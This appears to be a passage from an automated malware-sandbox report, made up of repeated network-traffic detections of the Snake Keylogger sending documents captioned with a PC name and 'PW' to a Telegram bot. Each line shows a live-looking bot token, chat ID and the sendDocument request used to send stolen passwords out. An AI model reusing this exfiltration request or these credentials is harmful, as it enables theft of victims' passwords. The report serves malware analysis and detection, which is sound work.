                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c7906228Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c7af6092Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c7d58614Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c7f484a9Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c81aabf8Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c88d1ae7Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c8b34098Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c8e08d43Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c925b1c0Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c963ae9bHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c9804bdaHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c99f48faHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c9be4785Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c9dd5aadHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c9fc4469Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ca18e239Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ca37e243Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ca4fb70bHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ca6eb568Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ca8b52f6Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255caa329fbHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cac2278aHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cae1260cHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cafdc418Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cb159961Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cb2d737bHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cb4a0dfeHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cb61e4d0Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cb79bc6fHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cb9659fdHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cbae3072Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cbdb7cb6Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cbf3540fHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cc08cab5Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cc20a359Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cc403d3dHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cc65c603Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cc7b3b50Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cc9a3987Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ccb9372eHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ccd10e90Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cce684f4Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cd0582ceHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cd1d59a0Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cd39f68cHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cd51cd5eHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cd69a4f9Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cd7f1cd4Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cda53fd6Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cdc43fbaHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cddc15ccHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cdf18b5fHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ce12ebbaHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ce55ad92Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ce6b24c9Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ce91498cHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ceb76f1cHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cecf467eHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ceee4404Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cf146a4eHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cf29df91Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cf48dd2bHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cf67dbc5Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cf9c5368Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cfc2757dHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cfda4c26Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255cff94c71Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255d018a361Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255d02dbe7dHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255d04cbcffHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255d06494a7Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255d53ebc56Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255d719308dHost: api.telegram.orgContent-Length: 407
